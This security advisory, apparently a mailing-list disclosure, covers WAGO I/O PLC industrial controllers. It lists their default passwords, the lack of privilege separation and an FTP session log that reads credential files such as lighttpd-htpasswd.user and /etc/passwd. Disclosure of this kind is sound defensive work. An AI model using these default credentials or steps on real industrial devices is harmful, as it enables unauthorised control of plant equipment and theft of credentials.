WAGO IO PLC 758-870 / 750-849 Credential Management / Privilege Separation

`*WAGO IO PLC 758-870, 750-849, 750-849 vulnerabilities*  
  
*Background*  
According to WAGO’s Web site, WAGO is an international company based in  
Germany. They operate production facilities in Germany, Switzerland,  
Poland, China, and India. WAGO maintains offices worldwide.  
  
According to WAGO, its products are deployed across several sectors  
including manufacturing, building automation, electric generation,  
transportation, and others. WAGO estimates that these products are used  
worldwide.  
  
*Vulnerability Details*  
  
*Weak Credential Management*  
CVE-ID: CVE-2015-6472  
  
*Affected models:*  
*WAGO IO 750-849 & 750-881*  
Modular I/O System. WAGO-I/O-IPC web-based management  
Order number 750-849  
Firmware revision 01.01.27 (04)  
Order number 750-849  
Firmware revision 01.02.05 (03)  
  
*WAGO IO 758-870*  
Modular I/O System. WAGO-I/O-IPC web-based management  
  
WAGO device models 750-849 and 750-881 come configured, by default, with  
three (3) accounts having weak credentials.  
  
admin - wago  
user - user  
guest - guest  
  
WAGO device model 758-870 comes configured, by default, with five (5)  
accounts having weak credentials.  
  
root:wago  
admin:wago  
user:user  
www:www  
guest:guest  
  
The application / system never initiates a forceful password change on  
first use or later for that matter.  
  
*Impact*  
Attackers are able to exploit these vulnerabilities by using the default  
credentials to gain unauthorized administrative access to the systems.  
  
*No privilege separation*  
CVE-ID: CVE-2015-6473  
  
*Affected models:*  
WAGO IO 750-849 & 750-881  
Modular I/O System. WAGO-I/O-IPC web-based management  
Order number 750-849  
Firmware revision 01.01.27 (04)  
Order number 750-881  
Firmware revision 01.02.05 (03)  
  
All three accounts can manage the device via HTTP(S) with full privileges.  
There seems to be no privilege separation when logged in as any user - all  
the functionality is available to these three accounts - admin, user, guest.  
  
*Impact*  
Attackers can control the device using any of the three default accounts &  
perform any changes without any restrictions.  
  
*Insecure ftp configuration / filesystem permissions*  
CVE-ID: *XXX [MITRE, CVE please]*  
  
WAGO IO 758-870 device also runs a FTP server. All the five (5) users  
documented above can log in over FTP.  
  
The FTP server configuration and filesystem permissions are set up  
insecurely and allows unauthorized file access.  
  
a. Login to FTP as 'guest' user  
b. Should have no access ideally outside ftproot /  
c. ’guest' can still access any file system location  
d. Multiple files across the file system have too open / unrestricted  
access permissions. 'guest' can access multiple, critical files.  
e. Access control is not enforced sufficiently, consistently & correctly.  
  
For example, ‘guest’ user is restricted and cannot download the /etc/passwd  
on the first attempt. However, *the system allows download of /etc/passwd  
file in the second attempt performed from a different directory with loose  
access permissions.*  
  
There may be other files accessible as well.  
  
*PoC*  
  
Connected to <IP>.  
220 FTP server ready.  
Name: guest  
331 User guest OK. Password required  
Password:  
230 OK. Current directory is /home/guest  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> ls  
229 Extended Passive mode OK (|||53957|)  
150 Accepted data connection  
226-Options: -l  
226 0 matches total  
ftp> ls  
229 Extended Passive mode OK (|||24432|)  
150 Accepted data connection  
226-Options: -l  
226 0 matches total  
  
ftp> ls /etc/  
  
229 Extended Passive mode OK (|||29997|)  
150 Accepted data connection  
-rw-r--r-- 1 0 0 44 Sep 27 2010 LICENSE  
-rw-r--r-- 1 0 0 22 Oct 1 2010 REVISIONS  
-rw-rw-rw- 1 0 0 26 Jun 7 2010 TZ  
-rw-r--r-- 1 0 0 96 Oct 1 2010 VIDEO_MODES  
-rwxr-xr-x 1 0 0 271 Oct 1 2010 cfg-kbus-irq.sh  
drwxrwsrwx 2 0 0 2048 Mar 3 14:39 config-tools  
-rw-r--r-- 1 0 0 504 Oct 1 2010 fstab  
-rw-r--r-- 1 0 0 80 Oct 1 2010 group  
-rw-r----- 1 0 0 27 Oct 1 2010 gshadow  
-rw-r--r-- 1 0 0 16 Oct 1 2010 homepartition  
-rw-rw-rw- 1 0 0 12 Oct 1 2010 hostname  
-rw-r--r-- 1 0 0 20 Oct 1 2010 hosts  
drwxr-xr-x 2 0 0 1024 Oct 1 2010 hotplug  
drwxr-xr-x 3 0 0 1024 Oct 1 2010 hotplug.d  
drwxr-xr-x 2 0 0 1024 Oct 1 2010 ifplugd  
-rw-r--r-- 1 0 0 58 Oct 1 2010 inetd.conf  
drwxrwxrwx 2 0 0 1024 Mar 2 18:15 init.d  
-rw-r--r-- 1 0 0 319 Oct 27 2014 inittab  
-rw-r--r-- 1 0 0 842 Jun 7 2010 inputrc  
-rw-r--r-- 1 0 0 128 Jun 7 2010 ipkg.conf  
drwxr-xr-x 2 0 0 1024 Jun 15 21:42 lighttpd  
lrwxrwxrwx 1 0 0 12 Oct 1 2010 mtab -> /proc/mounts  
drwxrwxrwx 6 0 0 1024 Feb 24 18:22 network  
-rw-r--r-- 1 0 0 1181 Oct 1 2010 nsswitch.conf  
-rw-r--r-- 1 0 0 40 Oct 1 2010 partitions  
-rw-r--r-- 1 0 0 459 Oct 1 2010 passwd  
drwxr-xr-x 2 0 0 1024 Oct 1 2010 php5  
------x--- 1 0 0 53 Mar 3 14:40 pointercal  
-rw-r--r-- 1 0 0 536 Oct 1 2010 profile  
-rw-r--r-- 1 0 0 178 Oct 1 2010 protocols  
-rw-r--r-- 1 0 0 8 Jun 7 2010 pure-ftpd.conf  
drwxrwxrwx 2 0 0 1024 Oct 1 2010 rc.d  
-rw-rw-rw- 1 0 0 53 Oct 1 2010 resolv.conf  
-rw-r--r-- 1 0 0 14 Oct 1 2010 rootpartition  
-rw-rw-rw- 1 0 0 341 Mar 2 17:08 rts3s.cfg  
-rwxr-xr-x 1 0 0 3012 Jun 7 2010 screenrc  
-rw-r--r-- 1 0 0 9590 Oct 1 2010 services  
-rw-r----- 1 0 0 338 Oct 1 2010 shadow  
-rw------- 1 0 0 280 Oct 1 2010 shadow-  
-r--r----- 1 0 0 1712 Jun 7 2010 sudoers  
-rwxrwxrwx 1 0 0 25 Jun 7 2010 timezone  
-rwxr-xr-x 1 0 0 511 Mar 3 14:37 ts.conf  
drwxr-xr-x 3 0 0 1024 Oct 1 2010 udev  
-rwxr-xr-- 1 0 0 798 Oct 1 2010 udhcpc.script  
-rw-r--r-- 1 0 0 357 Jun 15 21:42 webserver_conf.xml  
  
226-Options: -l  
226 45 matches total  
  
Note: As seen above, access permissions are too open on multiple files and  
directories.  
  
ftp> get /etc/shadow  
local: /etc/shadow remote: /etc/shadow  
ftp: Can't access `/etc/shadow': Permission denied  
  
ftp> get /etc/passwd  
local: /etc/passwd remote: /etc/passwd  
*ftp: Can't access `/etc/passwd': Permission denied*  
  
ftp> get /etc/webserver_conf.xml  
local: /etc/webserver_conf.xml remote: /etc/webserver_conf.xml  
ftp: Can't access `/etc/webserver_conf.xml': Permission denied  
  
ftp> get /etc/pure-ftpd.conf  
local: /etc/pure-ftpd.conf remote: /etc/pure-ftpd.conf  
ftp: Can't access `/etc/pure-ftpd.conf': Permission denied  
  
*ftp> cd /etc/lighttpd <— drwxr-xr-x*  
250 OK. Current directory is /etc/lighttpd  
ftp> ls  
229 Extended Passive mode OK (|||10281|)  
150 Accepted data connection  
-rw-r--r-- 1 12 102 65 Jun 7 2010  
lighttpd-htpasswd.user  
-rw-r--r-- 1 12 102 3743 Jun 15 21:42 lighttpd.conf  
-rw-r--r-- 1 12 102 414 Jun 7 2010 mod_fastcgi.conf  
  
226-Options: -l  
226 3 matches total  
  
ftp> get lighttpd-htpasswd.user  
  
local: lighttpd-htpasswd.user remote: lighttpd-htpasswd.user  
229 Extended Passive mode OK (|||52622|)  
150 Accepted data connection  
100%  
|***********************************************************************************************************|  
65 484.55 KiB/s 00:00 ETA  
  
226-File successfully transferred  
226 0.001 seconds (measured here), 71.89 Kbytes per second  
65 bytes received in 00:00 (3.14 KiB/s)  
ftp>  
ftp> get lighttpd.conf  
local: lighttpd.conf remote: lighttpd.conf  
229 Extended Passive mode OK (|||9954|)  
150 Accepted data connection  
100%  
|***********************************************************************************************************|  
3743 243.10 KiB/s 00:00 ETA  
  
226-File successfully transferred  
226 0.015 seconds (measured here), 249.64 Kbytes per second  
3743 bytes received in 00:00 (160.62 KiB/s)  
…..  
*Note*: Above configuration files contain credentials.  
  
Once in this directory, we can now also access /etc/passwd file  
  
*ftp> get /etc/passwd*  
local: /etc/passwd remote: /etc/passwd  
229 Extended Passive mode OK (|||1859|)  
150 Accepted data connection  
100%  
|***********************************************************************************************************|  
459 3.77 MiB/s 00:00 ETA  
*226-File successfully transferred*  
226 0.003 seconds (measured here), 143.76 Kbytes per second  
459 bytes received in 00:00 (35.35 KiB/s)  
  
+++++  
  
--   
Best Regards,  
Karn Ganeshen  
  
  
`